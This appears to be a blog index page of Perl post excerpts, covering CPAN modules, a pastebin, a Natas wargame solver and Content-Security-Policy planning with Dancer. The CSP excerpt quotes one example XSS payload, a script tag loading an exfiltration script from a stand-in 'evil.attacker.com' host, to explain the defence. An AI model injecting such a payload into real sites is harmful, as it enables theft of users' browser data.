Last Monday, I presented my solutions to the Natas server-side security war games at NSLUG. Afterwards, I spent some time to clean up my code, and I’ve now published it to CPAN as Hack::Natas, which comes with modules and scripts to solve level 15 and 16 in an automated way, plus walkthroughs for all the levels up to 17 written in Markdown (those are almost the same as my blog posts, so you’re not missing out by looking at only one or the other).
Introducing Hack::Natas
Introducing mvr: like mv, but clever
I wanted to move a large number of files from one directory to another, but the target directory already had many of the filenames already used. This is a common enough problem – digital cameras use DSC#, video downloaders often append numbers to get a unique filename, and so on. In both those examples, the sequence restarts if you empty the program’s work directory. So, you’ll end up with DSC0001.jpg every time you empty your camera’s memory card. If you’re trying to move such files into a single directory, you’ll get conflicts every time.
Instead of manually renaming the files before transferring them, I wrote a simple script to give each file a unique name in the destination directory.
Introducing Noose: just enough OO to hang yourself
Moose led to Mouse led to Moo led to Mo led finally to M, which gives you the least object-orientation possible, which is none at all. I quipped that Perl desperately needed a new OO module called Noose – just enough object orientation to hang yourself.
Permanent link for post:
/post/introducing-noose-just-enough-oo-to-hang-yourself/
Posted: Feb 7, 2013
Tags:
Posted: Feb 7, 2013
Tags:
Planning a Content-Security-Policy with Dancer
The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents a web site’s scripts from accessing and interacting with scripts used on other sites. This helps keep your data safe because if your bank’s website gives you some data, it can only be accessed by your bank’s website, and not by scripts from other websites.
That’s a nice theory, it’d be a shame if some evidence happened to it.
In the real world, attackers have found ways to get around the same-origin policy to gain access to data they’re not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage – perhaps a username. Well, if your username is <script type="text/javascript" src="http://evil.attacker.com/exfiltrate_browser_data.js"></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.
Permanent link for post:
/post/planning-a-content-security-policy-with-dancer/
Posted: Feb 1, 2013
Tags:
Posted: Feb 1, 2013
Tags:
Introducing File::Symlink::Atomic
In Tips & tricks from my 4 months at Pythian, I showed how to give a symlink a new target atomically. I wasn’t aware of any module to encapsulate that, so I quickly put together File::Symlink::Atomic.
This module is useful because it eliminates the need to know how to do this safely - simply use File::Symlink::Atomic and you get a drop-in replacement for CORE::symlink. It creates a temporary symlink (using File::Temp to get a unique pathname) pointing to your new target, then moves it into place with a rename call.
Wordpress theme for hashbang.ca
In the past month, a number of people have asked about the theme for this blog. I was particularly flattered that someone even asked where I bought it.
It is just a customized version of Joey Robinson’s Minimalist theme. My aim was to keep the same design principles – fast-loading, minimalism, readability – but update it to have a more modern look. One major goal was to have a truly great font via @font-face on modern browsers, so I used the Junction font from The League of Movable Type.
A pastebin with almost no user interface
I’ve always favoured pastebins that let you bin a paste and nothing more – p.defau.lt and sprunge.us spring to mind. I’ve made a Perl almost-clone of sprunge.us:
https://p.hashbang.ca now runs WWW::Hashbang::Pastebin, a simple pastebin written with Dancer and DBIx::Class that does nothing but store your text and show it back to you. The only feature beyond that is if you append a +, you’ll get line numbering (no syntax highlighting). You can use an anchor to jump to any line (click the line number), and the number for that line will be highlighted.
Introducing utf8::all
Perl programmers are probably all aware of the utf8 pragma, which turns on UTF-8 in your source code. This is actually a stumbling block for new programmers, who might think that utf8 makes your filehandles use UTF-8 by default, or automagically turns incoming data into UTF-8, and ensures outgoing data is all UTF-8 as well. Sadly, that’s not the case.
However, one of the great things about perl5i is that it turns on Unicode. All of it.
CLI Perl syntax highlighter
Last night, someone posed a problem in #perl-help. They wanted to have syntax highlighting in their shell for Perl code. I immediately suggested that they use Pygments – I knew about it because I’d used it before, and I had experimented with the command line tool. But I was surprised there wasn’t already a Perl solution.